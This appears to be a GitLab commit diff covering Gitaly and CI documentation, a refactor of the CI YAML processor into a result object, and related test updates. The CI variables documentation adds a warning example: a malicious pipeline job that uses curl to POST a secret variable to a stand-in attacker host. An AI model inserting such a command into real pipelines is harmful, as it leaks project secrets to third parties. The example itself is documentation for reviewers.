[standalone Gitaly documentation](../gitaly/index.md).
NOTE: **Note:**
The token referred to throughout the Gitaly documentation is an arbitrary
password selected by the administrator. This token is unrelated to tokens
created for the GitLab API or other similar web API tokens.
Note: **Note:** The token referred to throughout the Gitaly documentation is
just an arbitrary password selected by the administrator. It is unrelated to
tokens created for the GitLab API or other similar web API tokens.
Below we describe how to configure one Gitaly server `gitaly1.internal` with
secret token `gitalysecret`. We assume your GitLab installation has two
repository storages: `default` and `storage1`.
The following procedure describes how to configure a single Gitaly server named
`gitaly1.internal` with the secret token `gitalysecret`. We assume your GitLab
installation has two repository storages: `default` and `storage1`.
To configure the Gitaly server:
1. [Download/Install](https://about.gitlab.com/install/) the Omnibus GitLab
package you want using **steps 1 and 2** from the GitLab downloads page but
**without** providing the `EXTERNAL_URL` value.
1. Edit `/etc/gitlab/gitlab.rb` to configure storage paths, enable
the network listener and configure the token:
1. On the server node you want to use for Gitaly,
[download and install](https://about.gitlab.com/install/) your selected
Omnibus GitLab package using *steps 1 and 2* from the GitLab downloads page,
but *without* providing the `EXTERNAL_URL` value.
1. Edit the Gitaly server node's `/etc/gitlab/gitlab.rb` file to configure
storage paths, enable the network listener, and to configure the token:
<!--
updates to following example must also be made at
@ -440,11 +441,7 @@ To configure the Gitaly server:
# Set the network addresses that the exporters used for monitoring will listen on
node_exporter['listen_address'] = '0.0.0.0:9100'
```
1. Append the following to `/etc/gitlab/gitlab.rb` on `gitaly1.internal`:
```ruby
git_data_dirs({
'default' => {
'path' => '/var/opt/gitlab/git-data'
@ -455,12 +452,7 @@ To configure the Gitaly server:
})
```
<!--
updates to following example must also be made at
https://gitlab.com/gitlab-org/charts/gitlab/blob/master/doc/advanced/external-gitaly/external-omnibus-gitaly.md#configure-omnibus-gitlab
-->
1. Save the file and [reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure).
1. Save the file, and then [reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure).
1. Confirm that Gitaly can perform callbacks to the internal API:
```shell

View File

@ -141,6 +141,25 @@ The output is:
![Output custom variable](img/custom_variables_output.png)
Variables can only be updated or viewed by project members with [maintainer permissions](../../user/permissions.md#project-members-permissions).
#### Security
Malicious code pushed to your `.gitlab-ci.yml` file could compromise your variables and send them to a third party server regardless of the masked setting. If the pipeline runs on a [protected branch](../../user/project/protected_branches.md) or [protected tag](../../user/project/protected_tags.md), it could also compromise protected variables.
All merge requests that introduce changes to `.gitlab-ci.yml` should be reviewed carefully before:
- [Running a pipeline in the parent project for a merge request submitted from a forked project](../merge_request_pipelines/index.md#run-pipelines-in-the-parent-project-for-merge-requests-from-a-forked-project-starter).
- Merging the changes.
Here is a simplified example of a malicious `.gitlab-ci.yml`:
```yaml
build:
script:
- curl --request POST --data "secret_variable=$SECRET_VARIABLE" https://maliciouswebsite.abcd/
```
### Custom environment variables of type Variable
> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/46806) in GitLab 11.11.
@ -215,8 +234,8 @@ You can't mask variables that don't meet these requirements.
> Introduced in GitLab 9.3.
Variables can be protected. When a variable is
protected, it is securely passed to pipelines running on
[protected branches](../../user/project/protected_branches.md) or [protected tags](../../user/project/protected_tags.md) only. The other pipelines do not get
protected, it is only passed to pipelines running on
[protected branches](../../user/project/protected_branches.md) or [protected tags](../../user/project/protected_tags.md). The other pipelines do not get
the protected variable.
To protect a variable:
@ -227,8 +246,7 @@ To protect a variable:
1. Select the **Protect variable** check box.
1. Click **Update variable**.
The variable is available for all subsequent pipelines. Protected variables can only
be updated or viewed by project members with [maintainer permissions](../../user/permissions.md#project-members-permissions).
The variable is available for all subsequent pipelines.
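As a minimal sketch, a job like the following would only receive a protected variable when its pipeline runs for a protected branch or tag (the `deploy-production` job name, `deploy.sh` script, and `PRODUCTION_API_TOKEN` variable are illustrative, not part of this feature):

```yaml
deploy-production:
  stage: deploy
  script:
    # PRODUCTION_API_TOKEN is assumed to be configured as a protected variable;
    # it is not passed to pipelines running for unprotected refs.
    - ./deploy.sh "$PRODUCTION_API_TOKEN"
  only:
    - master
```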
### Custom variables validated by GitLab

View File

@ -43,6 +43,7 @@ Kubernetes-specific environment variables are detailed in the
| `CI_COMMIT_BRANCH` | 12.6 | 0.5 | The commit branch name. Present only when building branches. |
| `CI_COMMIT_TAG` | 9.0 | 0.5 | The commit tag name. Present only when building tags. |
| `CI_COMMIT_TITLE` | 10.8 | all | The title of the commit - the full first line of the message |
| `CI_COMMIT_TIMESTAMP` | 13.4 | all | The timestamp of the commit in the ISO 8601 format. |
| `CI_CONCURRENT_ID` | all | 11.10 | Unique ID of build execution within a single executor. |
| `CI_CONCURRENT_PROJECT_ID` | all | 11.10 | Unique ID of build execution within a single executor and project. |
| `CI_CONFIG_PATH` | 9.4 | 0.5 | The path to CI configuration file. Defaults to `.gitlab-ci.yml` |
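As an illustrative sketch of the new `CI_COMMIT_TIMESTAMP` variable, a job could read it like any other predefined variable (the job name and echoed message are hypothetical):

```yaml
print-commit-metadata:
  script:
    # CI_COMMIT_TIMESTAMP holds the commit date in ISO 8601 format,
    # for example 2020-09-01T18:10:48+00:00.
    - echo "Commit $CI_COMMIT_SHA was created at $CI_COMMIT_TIMESTAMP"
```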

View File

@ -1335,6 +1335,8 @@ expression string per rule, rather than an array of them. Any set of expressions
evaluated can be [conjoined into a single expression](../variables/README.md#conjunction--disjunction)
by using `&&` or `||`, and use
the [variable matching syntax](../variables/README.md#syntax-of-environment-variable-expressions).
Unlike variables in [`script`](../variables/README.md#syntax-of-environment-variables-in-job-scripts)
sections, variables in rules expressions are always formatted as `$VARIABLE`.
`if:` clauses are evaluated based on the values of [predefined environment variables](../variables/predefined_variables.md)
or [custom environment variables](../variables/README.md#custom-environment-variables).
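For example, a minimal sketch of this distinction (the `deploy-docs` job name and the custom `DEPLOY_DOCS` variable are illustrative):

```yaml
deploy-docs:
  rules:
    # In a rules expression, variables are always written as $VARIABLE.
    - if: '$CI_COMMIT_BRANCH == "master" && $DEPLOY_DOCS == "true"'
  script:
    # In a script section, the same variable is expanded by the shell.
    - echo "Deploying docs for branch $CI_COMMIT_BRANCH"
```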

View File

@ -263,8 +263,6 @@ For reference, GitLab.com's [auto-scaling shared runner](../user/gitlab_com/inde
CAUTION: **Caution:**
With GitLab 13.0 (May 2020) we have removed official support for Internet Explorer 11.
With the release of GitLab 13.4 (September 2020) we will remove all code that supports Internet Explorer 11.
You can provide feedback [on this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/197987) or via your usual support channels.
GitLab supports the following web browsers:
@ -276,7 +274,7 @@ GitLab supports the following web browsers:
For the listed web browsers, GitLab supports:
- The current and previous major versions of browsers except Internet Explorer.
- The current and previous major versions of browsers.
- The current minor version of a supported major version.
NOTE: **Note:**

View File

@ -95,7 +95,7 @@ module API
optional :visibility, type: String,
values: Gitlab::VisibilityLevel.string_values,
desc: 'The visibility of the snippet'
at_least_one_of :title, :file_name, :content, :visibility_level
at_least_one_of :title, :file_name, :content, :visibility
end
# rubocop: disable CodeReuse/ActiveRecord
put ":id/snippets/:snippet_id" do

View File

@ -62,6 +62,10 @@ module Gitlab
root.jobs_value
end
def normalized_jobs
@normalized_jobs ||= Ci::Config::Normalizer.new(jobs).normalize_jobs
end
private
def expand_config(config)

View File

@ -11,6 +11,7 @@ module Gitlab
end
def normalize_jobs
return {} unless @jobs_config
return @jobs_config if parallelized_jobs.empty?
expand_parallelize_jobs do |job_name, config|

View File

@ -45,14 +45,15 @@ module Gitlab
end
def static_validation(content)
result = Gitlab::Ci::YamlProcessor.new_with_validation_errors(
result = Gitlab::Ci::YamlProcessor.new(
content,
project: @project,
user: @current_user,
sha: @project.repository.commit.sha)
sha: @project.repository.commit.sha
).execute
Result.new(
jobs: static_validation_convert_to_jobs(result.config&.stages, result.config&.builds),
jobs: static_validation_convert_to_jobs(result),
errors: result.errors,
warnings: result.warnings
)
@ -76,12 +77,12 @@ module Gitlab
end
end
def static_validation_convert_to_jobs(stages, all_jobs)
def static_validation_convert_to_jobs(result)
jobs = []
return jobs unless stages || all_jobs
return jobs unless result.valid?
stages.each do |stage_name|
all_jobs.each do |job|
result.stages.each do |stage_name|
result.builds.each do |job|
next unless job[:stage] == stage_name
jobs << {

View File

@ -11,20 +11,23 @@ module Gitlab
def perform!
raise ArgumentError, 'missing config content' unless @command.config_content
@command.config_processor = ::Gitlab::Ci::YamlProcessor.new(
result = ::Gitlab::Ci::YamlProcessor.new(
@command.config_content, {
project: project,
sha: @pipeline.sha,
user: current_user,
parent_pipeline: parent_pipeline
}
)
).execute
add_warnings_to_pipeline(@command.config_processor.warnings)
rescue Gitlab::Ci::YamlProcessor::ValidationError => ex
add_warnings_to_pipeline(ex.warnings)
add_warnings_to_pipeline(result.warnings)
if result.valid?
@command.config_processor = result
else
error(result.errors.first, config_error: true)
end
error(ex.message, config_error: true)
rescue => ex
Gitlab::ErrorTracking.track_exception(ex,
project_id: project.id,

View File

@ -1,183 +1,65 @@
# frozen_string_literal: true
# This is the CI Linter component that runs the syntax validations
# while parsing the YAML config into a data structure that is
# then presented to the caller as result object.
# After syntax validations (done by Ci::Config), this component also
# runs logical validation on the built data structure.
module Gitlab
module Ci
class YamlProcessor
# ValidationError is treated like a result object in the form of an exception.
# We can return any warnings, raised during the config validation, along with
# the error object until we support multiple messages to be returned.
class ValidationError < StandardError
attr_reader :warnings
def initialize(message, warnings: [])
@warnings = warnings
super(message)
end
end
include Gitlab::Config::Entry::LegacyValidationHelpers
attr_reader :stages, :jobs
class Result
attr_reader :config, :errors, :warnings
def initialize(config: nil, errors: [], warnings: [])
@config = config
@errors = errors
@warnings = warnings
end
def valid?
config.present? && errors.empty?
end
end
def initialize(config, opts = {})
@ci_config = Gitlab::Ci::Config.new(config, **opts)
@config = @ci_config.to_hash
unless @ci_config.valid?
error!(@ci_config.errors.first)
end
initial_parsing
rescue Gitlab::Ci::Config::ConfigError => e
error!(e.message)
end
def self.new_with_validation_errors(content, opts = {})
return Result.new(errors: ['Please provide content of .gitlab-ci.yml']) if content.blank?
config = Gitlab::Ci::Config.new(content, **opts)
return Result.new(errors: config.errors, warnings: config.warnings) unless config.valid?
config = Gitlab::Ci::YamlProcessor.new(content, opts)
Result.new(config: config, warnings: config.warnings)
rescue ValidationError => e
Result.new(errors: [e.message], warnings: e.warnings)
rescue Gitlab::Ci::Config::ConfigError => e
Result.new(errors: [e.message])
end
def warnings
@ci_config&.warnings || []
end
def builds
@jobs.map do |name, _|
build_attributes(name)
end
end
def build_attributes(name)
job = @jobs.fetch(name.to_sym, {})
{ stage_idx: @stages.index(job[:stage]),
stage: job[:stage],
tag_list: job[:tags],
name: job[:name].to_s,
allow_failure: job[:ignore],
when: job[:when] || 'on_success',
environment: job[:environment_name],
coverage_regex: job[:coverage],
yaml_variables: transform_to_yaml_variables(job[:variables]),
needs_attributes: job.dig(:needs, :job),
interruptible: job[:interruptible],
only: job[:only],
except: job[:except],
rules: job[:rules],
cache: job[:cache],
resource_group_key: job[:resource_group],
scheduling_type: job[:scheduling_type],
secrets: job[:secrets],
options: {
image: job[:image],
services: job[:services],
artifacts: job[:artifacts],
dependencies: job[:dependencies],
cross_dependencies: job.dig(:needs, :cross_dependency),
job_timeout: job[:timeout],
before_script: job[:before_script],
script: job[:script],
after_script: job[:after_script],
environment: job[:environment],
retry: job[:retry],
parallel: job[:parallel],
instance: job[:instance],
start_in: job[:start_in],
trigger: job[:trigger],
bridge_needs: job.dig(:needs, :bridge)&.first,
release: release(job)
}.compact }.compact
end
def release(job)
job[:release]
end
def stage_builds_attributes(stage)
@jobs.values
.select { |job| job[:stage] == stage }
.map { |job| build_attributes(job[:name]) }
end
def stages_attributes
@stages.uniq.map do |stage|
seeds = stage_builds_attributes(stage)
{ name: stage, index: @stages.index(stage), builds: seeds }
end
end
def workflow_attributes
{
rules: @config.dig(:workflow, :rules),
yaml_variables: transform_to_yaml_variables(@variables)
}
end
ValidationError = Class.new(StandardError)
def self.validation_message(content, opts = {})
return 'Please provide content of .gitlab-ci.yml' if content.blank?
result = new(content, opts).execute
begin
Gitlab::Ci::YamlProcessor.new(content, opts)
nil
rescue ValidationError => e
e.message
result.errors.first
end
def initialize(config_content, opts = {})
@config_content = config_content
@opts = opts
end
def execute
if @config_content.blank?
return Result.new(errors: ['Please provide content of .gitlab-ci.yml'])
end
@ci_config = Gitlab::Ci::Config.new(@config_content, **@opts)
unless @ci_config.valid?
return Result.new(ci_config: @ci_config, errors: @ci_config.errors, warnings: @ci_config.warnings)
end
run_logical_validations!
Result.new(ci_config: @ci_config, warnings: @ci_config&.warnings)
rescue Gitlab::Ci::Config::ConfigError => e
Result.new(ci_config: @ci_config, errors: [e.message], warnings: @ci_config&.warnings)
rescue ValidationError => e
Result.new(ci_config: @ci_config, errors: [e.message], warnings: @ci_config&.warnings)
end
private
def initial_parsing
##
# Global config
#
@variables = @ci_config.variables
def run_logical_validations!
@stages = @ci_config.stages
##
# Jobs
#
@jobs = Ci::Config::Normalizer.new(@ci_config.jobs).normalize_jobs
@jobs = @ci_config.normalized_jobs
@jobs.each do |name, job|
# logical validation for job
validate_job_stage!(name, job)
validate_job_dependencies!(name, job)
validate_job_needs!(name, job)
validate_dynamic_child_pipeline_dependencies!(name, job)
validate_job_environment!(name, job)
validate_job!(name, job)
end
end
def transform_to_yaml_variables(variables)
variables.to_h.map do |key, value|
{ key: key.to_s, value: value, public: true }
end
def validate_job!(name, job)
validate_job_stage!(name, job)
validate_job_dependencies!(name, job)
validate_job_needs!(name, job)
validate_dynamic_child_pipeline_dependencies!(name, job)
validate_job_environment!(name, job)
end
def validate_job_stage!(name, job)
@ -188,10 +70,6 @@ module Gitlab
end
end
def error!(message)
raise ValidationError.new(message, warnings: warnings)
end
def validate_job_dependencies!(name, job)
return unless job[:dependencies]
@ -267,6 +145,10 @@ module Gitlab
error!("#{name} job: on_stop job #{on_stop} needs to have action stop defined")
end
end
def error!(message)
raise ValidationError.new(message)
end
end
end
end

View File

@ -0,0 +1,120 @@
# frozen_string_literal: true
# A data object that wraps `Ci::Config` and any messages
# (errors, warnings) generated by the YamlProcessor.
module Gitlab
module Ci
class YamlProcessor
class Result
attr_reader :errors, :warnings
def initialize(ci_config: nil, errors: [], warnings: [])
@ci_config = ci_config
@errors = errors || []
@warnings = warnings || []
end
def valid?
errors.empty?
end
def stages_attributes
stages.uniq.map do |stage|
seeds = stage_builds_attributes(stage)
{ name: stage, index: stages.index(stage), builds: seeds }
end
end
def builds
jobs.map do |name, _|
build_attributes(name)
end
end
def stage_builds_attributes(stage)
jobs.values
.select { |job| job[:stage] == stage }
.map { |job| build_attributes(job[:name]) }
end
def workflow_attributes
{
rules: hash_config.dig(:workflow, :rules),
yaml_variables: transform_to_yaml_variables(variables)
}
end
def jobs
@jobs ||= @ci_config.normalized_jobs
end
def stages
@stages ||= @ci_config.stages
end
def build_attributes(name)
job = jobs.fetch(name.to_sym, {})
{ stage_idx: stages.index(job[:stage]),
stage: job[:stage],
tag_list: job[:tags],
name: job[:name].to_s,
allow_failure: job[:ignore],
when: job[:when] || 'on_success',
environment: job[:environment_name],
coverage_regex: job[:coverage],
yaml_variables: transform_to_yaml_variables(job[:variables]),
needs_attributes: job.dig(:needs, :job),
interruptible: job[:interruptible],
only: job[:only],
except: job[:except],
rules: job[:rules],
cache: job[:cache],
resource_group_key: job[:resource_group],
scheduling_type: job[:scheduling_type],
secrets: job[:secrets],
options: {
image: job[:image],
services: job[:services],
artifacts: job[:artifacts],
dependencies: job[:dependencies],
cross_dependencies: job.dig(:needs, :cross_dependency),
job_timeout: job[:timeout],
before_script: job[:before_script],
script: job[:script],
after_script: job[:after_script],
environment: job[:environment],
retry: job[:retry],
parallel: job[:parallel],
instance: job[:instance],
start_in: job[:start_in],
trigger: job[:trigger],
bridge_needs: job.dig(:needs, :bridge)&.first,
release: release(job)
}.compact }.compact
end
private
def variables
@variables ||= @ci_config.variables
end
def hash_config
@hash_config ||= @ci_config.to_hash
end
def release(job)
job[:release]
end
def transform_to_yaml_variables(variables)
variables.to_h.map do |key, value|
{ key: key.to_s, value: value, public: true }
end
end
end
end
end
end

View File

@ -17338,18 +17338,12 @@ msgstr ""
msgid "Outbound requests"
msgstr ""
msgid "OutdatedBrowser|From May 2020 GitLab no longer supports Internet Explorer 11."
msgstr ""
msgid "OutdatedBrowser|GitLab may not work properly, because you are using an outdated web browser."
msgstr ""
msgid "OutdatedBrowser|Please install a %{browser_link_start}supported web browser%{browser_link_end} for a better experience."
msgstr ""
msgid "OutdatedBrowser|You can provide feedback %{feedback_link_start}on this issue%{feedback_link_end} or via your usual support channels."
msgstr ""
msgid "Outdent"
msgstr ""

View File

@ -98,7 +98,7 @@ RSpec.describe Projects::Ci::LintsController do
it_behaves_like 'returns a successful validation'
it 'runs validations through YamlProcessor' do
expect(Gitlab::Ci::YamlProcessor).to receive(:new_with_validation_errors).and_call_original
expect(Gitlab::Ci::YamlProcessor).to receive(:new).and_call_original
subject
end
@ -126,7 +126,7 @@ RSpec.describe Projects::Ci::LintsController do
it_behaves_like 'returns a successful validation'
it 'runs validations through YamlProcessor' do
expect(Gitlab::Ci::YamlProcessor).to receive(:new_with_validation_errors).and_call_original
expect(Gitlab::Ci::YamlProcessor).to receive(:new).and_call_original
subject
end

View File

@ -201,33 +201,61 @@ RSpec.describe Projects::JobsController, :clean_gitlab_redis_shared_state do
end
context 'when job has artifacts' do
before do
get_show_json
end
context 'with not expiry date' do
let(:job) { create(:ci_build, :success, :artifacts, pipeline: pipeline) }
it 'exposes needed information' do
get_show_json
expect(response).to have_gitlab_http_status(:ok)
expect(response).to match_response_schema('job/job_details')
expect(json_response['artifact']['download_path']).to match(%r{artifacts/download})
expect(json_response['artifact']['browse_path']).to match(%r{artifacts/browse})
expect(json_response['artifact']).not_to have_key('keep_path')
expect(json_response['artifact']).not_to have_key('expired')
expect(json_response['artifact']).not_to have_key('expired_at')
end
end
context 'with expiry date' do
context 'with expired artifacts' do
let(:job) { create(:ci_build, :success, :artifacts, :expired, pipeline: pipeline) }
it 'exposes needed information' do
expect(response).to have_gitlab_http_status(:ok)
expect(response).to match_response_schema('job/job_details')
expect(json_response['artifact']).not_to have_key('download_path')
expect(json_response['artifact']).not_to have_key('browse_path')
expect(json_response['artifact']['expired']).to eq(true)
expect(json_response['artifact']['expire_at']).not_to be_empty
context 'when artifacts are unlocked' do
before do
job.pipeline.unlocked!
end
it 'exposes needed information' do
get_show_json
expect(response).to have_gitlab_http_status(:ok)
expect(response).to match_response_schema('job/job_details')
expect(json_response['artifact']).not_to have_key('download_path')
expect(json_response['artifact']).not_to have_key('browse_path')
expect(json_response['artifact']).not_to have_key('keep_path')
expect(json_response['artifact']['expired']).to eq(true)
expect(json_response['artifact']['expire_at']).not_to be_empty
expect(json_response['artifact']['locked']).to eq(false)
end
end
context 'when artifacts are locked' do
before do
job.pipeline.artifacts_locked!
end
it 'exposes needed information' do
get_show_json
expect(response).to have_gitlab_http_status(:ok)
expect(response).to match_response_schema('job/job_details')
expect(json_response['artifact']).to have_key('download_path')
expect(json_response['artifact']).to have_key('browse_path')
expect(json_response['artifact']).to have_key('keep_path')
expect(json_response['artifact']['expired']).to eq(true)
expect(json_response['artifact']['expire_at']).not_to be_empty
expect(json_response['artifact']['locked']).to eq(true)
end
end
end
end

View File

@ -49,6 +49,7 @@ RSpec.describe Projects::MergeRequests::ContentController do
do_request(:widget)
expect(response).to match_response_schema('entities/merge_request_poll_widget')
expect(response.headers['Poll-Interval']).to eq('10000')
end
@ -64,6 +65,20 @@ RSpec.describe Projects::MergeRequests::ContentController do
expect(response.headers['Poll-Interval']).to eq('300000')
end
end
context 'with coverage data' do
let(:merge_request) { create(:merge_request, target_project: project, source_project: project, head_pipeline: head_pipeline) }
let!(:base_pipeline) { create(:ci_empty_pipeline, project: project, ref: merge_request.target_branch, sha: merge_request.diff_base_sha) }
let!(:head_pipeline) { create(:ci_empty_pipeline, project: project) }
let!(:rspec_base) { create(:ci_build, name: 'rspec', coverage: 93.1, pipeline: base_pipeline) }
let!(:rspec_head) { create(:ci_build, name: 'rspec', coverage: 97.1, pipeline: head_pipeline) }
it 'renders widget MR entity as json' do
do_request(:widget)
expect(response).to match_response_schema('entities/merge_request_poll_widget')
end
end
end
end

View File

@ -0,0 +1,9 @@
# frozen_string_literal: true
FactoryBot.define do
factory :instance_statistics_measurement, class: 'Analytics::InstanceStatistics::Measurement' do
recorded_at { Time.now }
identifier { Analytics::InstanceStatistics::Measurement.identifiers[:projects] }
count { 1_000 }
end
end

View File

@ -373,13 +373,29 @@ RSpec.describe 'Jobs', :clean_gitlab_redis_shared_state do
let(:expire_at) { Time.now + 7.days }
context 'when user has ability to update job' do
it 'keeps artifacts when keep button is clicked' do
expect(page).to have_content 'The artifacts will be removed in'
context 'when artifacts are unlocked' do
before do
job.pipeline.unlocked!
end
click_link 'Keep'
it 'keeps artifacts when keep button is clicked' do
expect(page).to have_content 'The artifacts will be removed in'
expect(page).to have_no_link 'Keep'
expect(page).to have_no_content 'The artifacts will be removed in'
click_link 'Keep'
expect(page).to have_no_link 'Keep'
expect(page).to have_no_content 'The artifacts will be removed in'
end
end
context 'when artifacts are locked' do
before do
job.pipeline.artifacts_locked!
end
it 'shows the keep button' do
expect(page).to have_link 'Keep'
end
end
end
@ -395,9 +411,26 @@ RSpec.describe 'Jobs', :clean_gitlab_redis_shared_state do
context 'when artifacts expired' do
let(:expire_at) { Time.now - 7.days }
it 'does not have the Keep button' do
expect(page).to have_content 'The artifacts were removed'
expect(page).not_to have_link 'Keep'
context 'when artifacts are unlocked' do
before do
job.pipeline.unlocked!
end
it 'does not have the Keep button' do
expect(page).to have_content 'The artifacts were removed'
expect(page).not_to have_link 'Keep'
end
end
context 'when artifacts are locked' do
before do
job.pipeline.artifacts_locked!
end
it 'has the Keep button' do
expect(page).not_to have_content 'The artifacts were removed'
expect(page).to have_link 'Keep'
end
end
end
end

View File

@ -22,6 +22,14 @@
"only_allow_merge_if_pipeline_succeeds": { "type": "boolean" },
"has_ci": { "type": "boolean" },
"ci_status": { "type": ["string", "null"] },
"pipeline_coverage_delta": { "type": ["float", "null"] },
"builds_with_coverage": {
"type": ["array", "null"],
"items": {
"type": "object",
"required": ["name", "coverage"]
}
},
"cancel_auto_merge_path": { "type": ["string", "null"] },
"test_reports_path": { "type": ["string", "null"] },
"create_issue_to_resolve_discussions_path": { "type": ["string", "null"] },

View File

@ -128,26 +128,6 @@ describe('DiffFile', () => {
});
});
it('should auto-expand collapsed files when viewDiffsFileByFile is true', done => {
vm.$destroy();
window.gon = {
features: { autoExpandCollapsedDiffs: true },
};
vm = createComponentWithStore(Vue.extend(DiffFileComponent), createStore(), {
file: JSON.parse(JSON.stringify(diffFileMockDataUnreadable)),
canCurrentUserFork: false,
viewDiffsFileByFile: true,
}).$mount();
vm.$nextTick(() => {
expect(vm.$el.innerText).not.toContain('This diff is collapsed');
window.gon = {};
done();
});
});
it('should be collapsed for renamed files', done => {
vm.renderIt = true;
vm.isCollapsed = false;

View File

@ -0,0 +1,77 @@
import { shallowMount, mount } from '@vue/test-utils';
import MergeConflictWarning from '~/diffs/components/merge_conflict_warning.vue';
import { CENTERED_LIMITED_CONTAINER_CLASSES } from '~/diffs/constants';
const propsData = {
limited: true,
mergeable: true,
resolutionPath: 'a-path',
};
const limitedClasses = CENTERED_LIMITED_CONTAINER_CLASSES.split(' ');
function findResolveButton(wrapper) {
return wrapper.find('.gl-alert-actions a.gl-button:first-child');
}
function findLocalMergeButton(wrapper) {
return wrapper.find('.gl-alert-actions button.gl-button:last-child');
}
describe('MergeConflictWarning', () => {
let wrapper;
const createComponent = (props = {}, { full } = { full: false }) => {
const mounter = full ? mount : shallowMount;
wrapper = mounter(MergeConflictWarning, {
propsData: { ...propsData, ...props },
});
};
afterEach(() => {
wrapper.destroy();
});
it.each`
limited | containerClasses
${true} | ${limitedClasses}
${false} | ${[]}
`(
'has the correct container classes when limited is $limited',
({ limited, containerClasses }) => {
createComponent({ limited });
expect(wrapper.classes()).toEqual(containerClasses);
},
);
it.each`
present | resolutionPath
${false} | ${''}
${true} | ${'some-path'}
`(
'toggles the resolve conflicts button based on the provided resolutionPath "$resolutionPath"',
({ present, resolutionPath }) => {
createComponent({ resolutionPath }, { full: true });
const resolveButton = findResolveButton(wrapper);
expect(resolveButton.exists()).toBe(present);
if (present) {
expect(resolveButton.attributes('href')).toBe(resolutionPath);
}
},
);
it.each`
present | mergeable
${false} | ${false}
${true} | ${true}
`(
'toggles the local merge button based on the provided mergeable property "$mergeable"',
({ present, mergeable }) => {
createComponent({ mergeable }, { full: true });
const localMerge = findLocalMergeButton(wrapper);
expect(localMerge.exists()).toBe(present);
},
);
});

View File

@ -16,6 +16,9 @@ describe('graph component', () => {
let wrapper;
const findExpandPipelineBtn = () => wrapper.find('[data-testid="expandPipelineButton"]');
const findAllExpandPipelineBtns = () => wrapper.findAll('[data-testid="expandPipelineButton"]');
beforeEach(() => {
setHTMLFixture('<div class="layout-page"></div>');
});
@ -167,7 +170,7 @@ describe('graph component', () => {
describe('triggered by', () => {
describe('on click', () => {
it('should emit `onClickTriggeredBy` when triggered by linked pipeline is clicked', () => {
const btnWrapper = wrapper.find('.linked-pipeline-content');
const btnWrapper = findExpandPipelineBtn();
btnWrapper.trigger('click');
@ -213,7 +216,7 @@ describe('graph component', () => {
),
});
const btnWrappers = wrapper.findAll('.linked-pipeline-content');
const btnWrappers = findAllExpandPipelineBtns();
const downstreamBtnWrapper = btnWrappers.at(btnWrappers.length - 1);
downstreamBtnWrapper.trigger('click');

View File

@ -13,6 +13,7 @@ describe('pipeline graph job item', () => {
});
};
const triggerActiveClass = 'gl-shadow-x0-y0-b3-s1-blue-500';
const delayedJobFixture = getJSONFixture('jobs/delayed.json');
const mockJob = {
id: 4256,
@ -33,6 +34,18 @@ describe('pipeline graph job item', () => {
},
},
};
const mockJobWithoutDetails = {
id: 4257,
name: 'test',
status: {
icon: 'status_success',
text: 'passed',
label: 'passed',
group: 'success',
details_path: '/root/ci-mock/builds/4257',
has_details: false,
},
};
afterEach(() => {
wrapper.destroy();
@ -61,18 +74,7 @@ describe('pipeline graph job item', () => {
describe('name without link', () => {
beforeEach(() => {
createWrapper({
job: {
id: 4257,
name: 'test',
status: {
icon: 'status_success',
text: 'passed',
label: 'passed',
group: 'success',
details_path: '/root/ci-mock/builds/4257',
has_details: false,
},
},
job: mockJobWithoutDetails,
cssClassJobName: 'css-class-job-name',
jobHovered: 'test',
});
@ -86,7 +88,7 @@ describe('pipeline graph job item', () => {
});
it('should apply hover class and provided class name', () => {
expect(findJobWithoutLink().classes()).toContain('gl-inset-border-1-blue-500');
expect(findJobWithoutLink().classes()).toContain(triggerActiveClass);
expect(findJobWithoutLink().classes()).toContain('css-class-job-name');
});
});
@ -154,4 +156,24 @@ describe('pipeline graph job item', () => {
);
});
});
describe('trigger job highlighting', () => {
it('trigger job should stay highlighted when downstream is expanded', () => {
createWrapper({
job: mockJobWithoutDetails,
pipelineExpanded: { jobName: mockJob.name, expanded: true },
});
expect(findJobWithoutLink().classes()).toContain(triggerActiveClass);
});
it('trigger job should not be highlighted when downstream is closed', () => {
createWrapper({
job: mockJobWithoutDetails,
pipelineExpanded: { jobName: mockJob.name, expanded: false },
});
expect(findJobWithoutLink().classes()).not.toContain(triggerActiveClass);
});
});
});

View File

@ -1,5 +1,5 @@
import { mount } from '@vue/test-utils';
import { GlButton } from '@gitlab/ui';
import { GlButton, GlLoadingIcon } from '@gitlab/ui';
import LinkedPipelineComponent from '~/pipelines/components/graph/linked_pipeline.vue';
import CiStatus from '~/vue_shared/components/ci_icon.vue';
@ -16,10 +16,18 @@ describe('Linked pipeline', () => {
const findButton = () => wrapper.find(GlButton);
const findPipelineLabel = () => wrapper.find('[data-testid="downstream-pipeline-label"]');
const findLinkedPipeline = () => wrapper.find({ ref: 'linkedPipeline' });
const findLoadingIcon = () => wrapper.find(GlLoadingIcon);
const findPipelineLink = () => wrapper.find('[data-testid="childPipelineLink"]');
const findExpandButton = () => wrapper.find('[data-testid="expandPipelineButton"]');
const createWrapper = propsData => {
const createWrapper = (propsData, data = []) => {
wrapper = mount(LinkedPipelineComponent, {
propsData,
data() {
return {
...data,
};
},
});
};
@ -76,7 +84,7 @@ describe('Linked pipeline', () => {
});
it('should render the tooltip text as the title attribute', () => {
const titleAttr = findButton().attributes('title');
const titleAttr = findLinkedPipeline().attributes('title');
expect(titleAttr).toContain(mockPipeline.project.name);
expect(titleAttr).toContain(mockPipeline.details.status.label);
@ -117,6 +125,56 @@ describe('Linked pipeline', () => {
createWrapper(upstreamProps);
expect(findPipelineLabel().exists()).toBe(true);
});
it('downstream pipeline should link to the child pipeline if child', () => {
createWrapper(downstreamProps);
expect(findPipelineLink().attributes('href')).toBe(mockData.triggered_by.path);
});
it('upstream pipeline should not contain a link', () => {
createWrapper(upstreamProps);
expect(findPipelineLink().exists()).toBe(false);
});
it.each`
presentClass | missingClass
${'gl-right-0'} | ${'gl-left-0'}
${'gl-border-l-1!'} | ${'gl-border-r-1!'}
`(
'pipeline expand button should be positioned right when child pipeline',
({ presentClass, missingClass }) => {
createWrapper(downstreamProps);
expect(findExpandButton().classes()).toContain(presentClass);
expect(findExpandButton().classes()).not.toContain(missingClass);
},
);
it.each`
presentClass | missingClass
${'gl-left-0'} | ${'gl-right-0'}
${'gl-border-r-1!'} | ${'gl-border-l-1!'}
`(
'pipeline expand button should be positioned left when parent pipeline',
({ presentClass, missingClass }) => {
createWrapper(upstreamProps);
expect(findExpandButton().classes()).toContain(presentClass);
expect(findExpandButton().classes()).not.toContain(missingClass);
},
);
it.each`
